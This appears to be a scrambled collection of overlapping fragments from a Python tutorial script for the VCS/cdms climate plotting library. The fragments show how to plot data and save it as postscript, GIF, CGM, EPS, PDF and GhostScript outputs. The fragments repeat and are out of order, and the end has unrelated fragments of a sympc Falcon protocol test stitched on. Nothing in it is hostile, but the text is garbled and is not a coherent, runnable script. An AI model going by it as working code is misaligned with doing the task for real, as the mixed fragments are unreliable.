############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600')", "for # manipulating variables. # time - This module provides various functions to", "gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm", "you're on. # sys - This module provides access to some objects used", "the modules needed for the tuturial # cdms - Climate Data Management system", "command! v.open() # A quick plot of the data v.plot( data ) #", "before issuing the plot command! v.open() # A quick plot of the data", "System 1D and 2D plotting routines. # cdutil - Climate utilitizes that contains", "VCS: v = vcs.init() # Opening a VCS Canvas - not necessary to", "of the many # GhostScript (gs) file types (also known as devices). To", "vcs.init() # Opening a VCS Canvas - not necessary to do this #", "file v.postscript('test.ps') # GIF format - append landscape orientation gif image v.gif('test.gif', merge='a',", "known as devices). To view other # GhostScript devices, issue the command \"gs", "orientation graphics to file # ############################################################## # Append postscript output to an existing", "VCS Canvas - not necessary to do this # before issuing the plot", "gridded data. # vcs - Visualization and control System 1D and 2D plotting", "output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a", "VCS canvas in one of the many # GhostScript (gs) file types (also", "as devices). To view other # GhostScript devices, issue the command \"gs --help\"", "# before issuing the plot command! 
v.open() # A quick plot of the", "file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format #", "for the tuturial # cdms - Climate Data Management system accesses gridded data.", "Postscript - overwrite an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf')", "Import the modules needed for the tuturial # cdms - Climate Data Management", "- not necessary to do this # before issuing the plot command! v.open()", "GhostScript devices, issue the command \"gs --help\" at the terminal # prompt. ##############################################################", "resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print", "the system you're on. # sys - This module provides access to some", "system you're on. # sys - This module provides access to some objects", "cdutil - Climate utilitizes that contains miscellaneous routines for # manipulating variables. #", "data ) # Changing plot orientation to \"Portrait\" v.portrait() # To change the", "v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to", "contains miscellaneous routines for # manipulating variables. 
# time - This module provides", "\"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics", "# Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF", "os - Operation System routines for Mac, DOS, NT, or Posix depending on", "# Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r') # PDF", "device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\"", "# # Saving \"Portrait\" orientation graphics to file # ############################################################## # Append postscript", "\"Portrait\" v.portrait() # To change the orientation back to \"Landscape\" v.landscape() print \"Generating", "other # GhostScript devices, issue the command \"gs --help\" at the terminal #", "types (also known as devices). To view other # GhostScript devices, issue the", "filepath ) # Extract a 3 dimensional data set data = cdmsfile('clt') #", "file with a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif", "interpreter and to functions that interact strongly with the interpreter. import vcs, cdms2", "Posix depending on # the system you're on. 
# sys - This module", "############################################################## # # Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the", "set data = cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a", "plot orientation to \"Portrait\" v.portrait() # To change the orientation back to \"Landscape\"", "'a') # Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r') #", "'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional data set", "v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with portriat gif image", "file types (also known as devices). To view other # GhostScript devices, issue", "postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF format", "append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format -", "resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ##############################################################", "v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating", "# cdms - Climate Data Management system accesses gridded data. # vcs -", "depending on # the system you're on. # sys - This module provides", "os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open(", "v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This", "used or maintained by # the interpreter and to functions that interact strongly", "format # This routine allows the user to save the VCS canvas in", "and to functions that interact strongly with the interpreter. 
import vcs, cdms2 as", "allows the user to save the VCS canvas in one of the many", "with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite", "print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file", "# prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l',", "the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif',", "file # \"Landscape\" is the default output orientation. # ############################################################## # Append to", "with a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s)", "orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving", "graphics to file # ############################################################## # Append postscript output to an existing file", "# Opening a VCS Canvas - not necessary to do this # before", "issue the command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg', device='jpeg',", "v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p') #", "(gs) file types (also known as devices). To view other # GhostScript devices,", "portait output to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format", "CGM format - append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated", "2D plotting routines. 
# cdutil - Climate utilitizes that contains miscellaneous routines for", "sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath", "= vcs.init() # Opening a VCS Canvas - not necessary to do this", "plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving", "Climate Data Management system accesses gridded data. # vcs - Visualization and control", "to file # ############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p')", "accesses gridded data. # vcs - Visualization and control System 1D and 2D", "that interact strongly with the interpreter. import vcs, cdms2 as cdms, cdutil, time,", "issuing the plot command! v.open() # A quick plot of the data v.plot(", "command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256',", "devices, issue the command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example')", "\"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics", "Visualization and control System 1D and 2D plotting routines. # cdutil - Climate", "# Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath )", "sys - This module provides access to some objects used or maintained by", "orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') #", "tuturial # cdms - Climate Data Management system accesses gridded data. 
# vcs", "routines for Mac, DOS, NT, or Posix depending on # the system you're", "to some objects used or maintained by # the interpreter and to functions", "and control System 1D and 2D plotting routines. # cdutil - Climate utilitizes", "access to some objects used or maintained by # the interpreter and to", "devices). To view other # GhostScript devices, issue the command \"gs --help\" at", "portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing", "format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows the user", "= os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional", "convertcdms.py # Import the modules needed for the tuturial # cdms - Climate", "- overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600')", "# Append to a postscript file v.postscript('test.ps') # Overwrite the existing postscript file", "# defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l',", "orientation='l', geometry='800x600') # CGM format - append to an existing cgm file v.cgm('test.cgm',", "# Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the default output", "= cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a VCS Canvas", "numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the tuturial # cdms", "a VCS Canvas - not necessary to do this # before issuing the", "3 dimensional data set data = cdmsfile('clt') # Initialize VCS: v = vcs.init()", "the data v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait() #", "save the VCS canvas in one of the many # GhostScript (gs) file", "'p') # PDF format v.pdf ('test.pdf', 'p') 
############################################################### # GhostScript (gs) format #", "and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot", "1D and 2D plotting routines. # cdutil - Climate utilitizes that contains miscellaneous", "# Changing plot orientation to \"Portrait\" v.portrait() # To change the orientation back", "dimensional data set data = cdmsfile('clt') # Initialize VCS: v = vcs.init() #", "modules needed for the tuturial # cdms - Climate Data Management system accesses", "############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing", "terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack',", "Canvas - not necessary to do this # before issuing the plot command!", "Opening a VCS Canvas - not necessary to do this # before issuing", "\"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file #", "os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional data", "Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # #", "output to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf", "\"gs --help\" at the terminal # prompt. 
############################################################## v.gs('example') # defaults: device='png256', orientation='l'", "cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional data set data", "orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing", "output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file # ############################################################## #", "v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to an existing cgm", "- append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format", "canvas in one of the many # GhostScript (gs) file types (also known", "(gs) format # This routine allows the user to save the VCS canvas", "file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps',", "orientation to \"Portrait\" v.portrait() # To change the orientation back to \"Landscape\" v.landscape()", "# GhostScript (gs) format # This routine allows the user to save the", "an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p')", "time - This module provides various functions to mainpulate time values. # os", "as cdms, cdutil, time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data,", "some objects used or maintained by # the interpreter and to functions that", "to mainpulate time values. # os - Operation System routines for Mac, DOS,", "manipulating variables. # time - This module provides various functions to mainpulate time", "on # the system you're on. # sys - This module provides access", "the default output orientation. 
# ############################################################## # Append to a postscript file v.postscript('test.ps')", "cdms - Climate Data Management system accesses gridded data. # vcs - Visualization", "# the system you're on. # sys - This module provides access to", "image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format", "to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an", "v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm',", "eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### #", "Extract a 3 dimensional data set data = cdmsfile('clt') # Initialize VCS: v", "'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine", "# Initialize VCS: v = vcs.init() # Opening a VCS Canvas - not", "with the interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys #", "system accesses gridded data. # vcs - Visualization and control System 1D and", "v = vcs.init() # Opening a VCS Canvas - not necessary to do", "the many # GhostScript (gs) file types (also known as devices). To view", "at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612'", "cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to an", "do this # before issuing the plot command! v.open() # A quick plot", "- Visualization and control System 1D and 2D plotting routines. # cdutil -", "data v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait() # To", "issue the command \"gs --help\" at the terminal # prompt. 
############################################################## v.gs('example') #", "the command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults:", "# PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows", "existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs)", "cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a VCS Canvas -", "Adapted for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the tuturial", "output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file # \"Landscape\" is", "vcs - Visualization and control System 1D and 2D plotting routines. # cdutil", "# os - Operation System routines for Mac, DOS, NT, or Posix depending", "v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r')", "############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf',", "output orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite", "- Operation System routines for Mac, DOS, NT, or Posix depending on #", "# GhostScript (gs) file types (also known as devices). 
To view other #", "v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs)", "module provides access to some objects used or maintained by # the interpreter", "print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file", "- overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait", "cdutil, time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile", ") # Extract a 3 dimensional data set data = cdmsfile('clt') # Initialize", "image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file", "to file # \"Landscape\" is the default output orientation. # ############################################################## # Append", "To view other # GhostScript devices, issue the command \"gs --help\" at the", "in one of the many # GhostScript (gs) file types (also known as", "# GIF format - overwrite gif image(s) output with portriat gif image v.gif('test.gif',", "variables. # time - This module provides various functions to mainpulate time values.", "the VCS canvas in one of the many # GhostScript (gs) file types", "data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract", "plot of the data v.plot( data ) # Changing plot orientation to \"Portrait\"", "v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait() # To change", "various functions to mainpulate time values. # os - Operation System routines for", "geometry='800x600') # CGM format - append to an existing cgm file v.cgm('test.cgm', 'a')", "gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to an", "interact strongly with the interpreter. 
import vcs, cdms2 as cdms, cdutil, time, os,", "v.open() # A quick plot of the data v.plot( data ) # Changing", "# A quick plot of the data v.plot( data ) # Changing plot", "('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine allows the user", "user to save the VCS canvas in one of the many # GhostScript", "or maintained by # the interpreter and to functions that interact strongly with", "format - overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p',", "Changing plot orientation to \"Portrait\" v.portrait() # To change the orientation back to", "This module provides various functions to mainpulate time values. # os - Operation", "time values. # os - Operation System routines for Mac, DOS, NT, or", "# sys - This module provides access to some objects used or maintained", "plot command! v.open() # A quick plot of the data v.plot( data )", "\"Landscape\" is the default output orientation. # ############################################################## # Append to a postscript", "Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file", "many # GhostScript (gs) file types (also known as devices). To view other", "objects used or maintained by # the interpreter and to functions that interact", "'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format", "to do this # before issuing the plot command! v.open() # A quick", "by # the interpreter and to functions that interact strongly with the interpreter.", "v.portrait() # To change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape", "orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait()", "on. 
# sys - This module provides access to some objects used or", "postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite", "# PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This", "existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps", "routines for # manipulating variables. # time - This module provides various functions", "\"Portrait\" orientation graphics to file # ############################################################## # Append postscript output to an", "file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with portriat gif", "plotting routines. # cdutil - Climate utilitizes that contains miscellaneous routines for #", "PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine", "Climate utilitizes that contains miscellaneous routines for # manipulating variables. # time -", "postscript file v.postscript('test.ps') # GIF format - append landscape orientation gif image v.gif('test.gif',", "a 3 dimensional data set data = cdmsfile('clt') # Initialize VCS: v =", "the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # #", "one of the many # GhostScript (gs) file types (also known as devices).", "Initialize VCS: v = vcs.init() # Opening a VCS Canvas - not necessary", "############################################################## # # Saving \"Portrait\" orientation graphics to file # ############################################################## # Append", "to functions that interact strongly with the interpreter. 
import vcs, cdms2 as cdms,", "device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait", "back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\"", "overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output", "- append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript -", "orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\"", "landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append", "v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF format - append", "# Import the modules needed for the tuturial # cdms - Climate Data", "this # before issuing the plot command! v.open() # A quick plot of", "provides various functions to mainpulate time values. # os - Operation System routines", "Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r') # PDF format", "the command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg', device='jpeg', orientation='p',", "# GhostScript devices, issue the command \"gs --help\" at the terminal # prompt.", "Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file # ##############################################################", "merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r')", "or Posix depending on # the system you're on. # sys - This", "append portait output to an existing eps file. 
v.eps('test.eps', 'a', 'p') # PDF", "time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile =", "file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF format -", "existing postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF format -", "Overwrite the existing postscript file v.postscript('test.ps') # GIF format - append landscape orientation", "Management system accesses gridded data. # vcs - Visualization and control System 1D", "to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation", "Encapsulated Postscript - append portait output to an existing eps file. v.eps('test.eps', 'a',", "This routine allows the user to save the VCS canvas in one of", "\"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file #", "a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output", "format - append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript", "the tuturial # cdms - Climate Data Management system accesses gridded data. 
#", "the existing postscript file v.postscript('test.ps') # GIF format - append landscape orientation gif", "# GIF format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600')", "# ############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite the existing", "Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file # \"Landscape\"", "PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows the", "# ############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite", "v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to an existing eps", ") # Changing plot orientation to \"Portrait\" v.portrait() # To change the orientation", "to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf',", "# \"Landscape\" is the default output orientation. # ############################################################## # Append to a", "# Saving \"Portrait\" orientation graphics to file # ############################################################## # Append postscript output", "file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript", "a postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF", "# CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript", "that contains miscellaneous routines for # manipulating variables. 
# time - This module", "existing postscript file v.postscript('test.ps') # GIF format - append landscape orientation gif image", "= cdms.open( filepath ) # Extract a 3 dimensional data set data =", "view other # GhostScript devices, issue the command \"gs --help\" at the terminal", "the user to save the VCS canvas in one of the many #", "data = cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a VCS", "an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript", "functions that interact strongly with the interpreter. import vcs, cdms2 as cdms, cdutil,", "To change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ##############################################################", "cdms2 as cdms, cdutil, time, os, sys # Open data file: filepath =", "new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with", "orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\"", "to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation", "file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p')", "format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append", "Append to a postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps')", "# cdutil - Climate utilitizes that contains miscellaneous routines for # manipulating variables.", "- append portait output to an existing eps file. 
v.eps('test.eps', 'a', 'p') #", "needed for the tuturial # cdms - Climate Data Management system accesses gridded", "an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript", "# vcs - Visualization and control System 1D and 2D plotting routines. #", "orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to", "v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to", "existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to", "# This routine allows the user to save the VCS canvas in one", "graphics to file # \"Landscape\" is the default output orientation. # ############################################################## #", "GhostScript devices, issue the command \"gs --help\" at the terminal # prompt. ###############################################################", "# Encapsulated Postscript - append portait output to an existing eps file. v.eps('test.eps',", "routines. # cdutil - Climate utilitizes that contains miscellaneous routines for # manipulating", "--help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and", "############################################################## # GhostScript (gs) format # This routine allows the user to save", "import vcs, cdms2 as cdms, cdutil, time, os, sys # Open data file:", "orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite the", "module provides various functions to mainpulate time values. # os - Operation System", "the interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys # Open", "interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys # Open data", "data. 
# vcs - Visualization and control System 1D and 2D plotting routines.", "############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite the existing postscript", "existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript file", "for Mac, DOS, NT, or Posix depending on # the system you're on.", "This module provides access to some objects used or maintained by # the", "GhostScript (gs) file types (also known as devices). To view other # GhostScript", "overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') #", "'r') # Encapsulated Postscript - append portait output to an existing eps file.", "is the default output orientation. # ############################################################## # Append to a postscript file", "############################################################### # GhostScript (gs) format # This routine allows the user to save", "GIF format - overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r',", "v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite',", "# time - This module provides various functions to mainpulate time values. #", "filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3", "resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation", "change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## #", "Postscript - append portait output to an existing eps file. 
v.eps('test.eps', 'a', 'p')", "- Climate Data Management system accesses gridded data. # vcs - Visualization and", "devices, issue the command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg',", "overwrite an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## #", "strongly with the interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys", "v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine allows the", "# Extract a 3 dimensional data set data = cdmsfile('clt') # Initialize VCS:", "file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a", "eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format", "Mac, DOS, NT, or Posix depending on # the system you're on. #", "gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM", "existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ###############################################################", "geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated", "GIF format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') #", "postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with portriat", "\"Landscape\" orientation graphics to file # \"Landscape\" is the default output orientation. 
#", "CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript -", "cdms.open( filepath ) # Extract a 3 dimensional data set data = cdmsfile('clt')", "cdms, cdutil, time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc')", "and 2D plotting routines. # cdutil - Climate utilitizes that contains miscellaneous routines", "by convertcdms.py # Import the modules needed for the tuturial # cdms -", "# Overwrite the existing postscript file v.postscript('test.ps') # GIF format - append landscape", "# Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript", "Saving \"Portrait\" orientation graphics to file # ############################################################## # Append postscript output to", "- overwrite an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ##############################################################", "to \"Portrait\" v.portrait() # To change the orientation back to \"Landscape\" v.landscape() print", "# Adapted for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the", "to a postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') #", "utilitizes that contains miscellaneous routines for # manipulating variables. # time - This", "- This module provides various functions to mainpulate time values. # os -", "output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format -", "file # ############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p') #", "A quick plot of the data v.plot( data ) # Changing plot orientation", "the interpreter and to functions that interact strongly with the interpreter. import vcs,", "(also known as devices). To view other # GhostScript devices, issue the command", "functions to mainpulate time values. 
# os - Operation System routines for Mac,", "DOS, NT, or Posix depending on # the system you're on. # sys", "merge='a', orientation='l', geometry='800x600') # CGM format - append to an existing cgm file", "default output orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps') #", "# Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## #" ]
[ "test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon)", "import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) ->", "= (1,) shape_y = (1,) # create an inconsistent sharing,invoke a prrs first", "import pytest from sympc.protocol import Falcon from sympc.session import Session from sympc.session import", "CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session =", "SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an inconsistent sharing,invoke a", "= (1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError):", "session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x, \"b_shape\": shape_y}, )", "Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None:", "SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon", "sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\")", "import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties 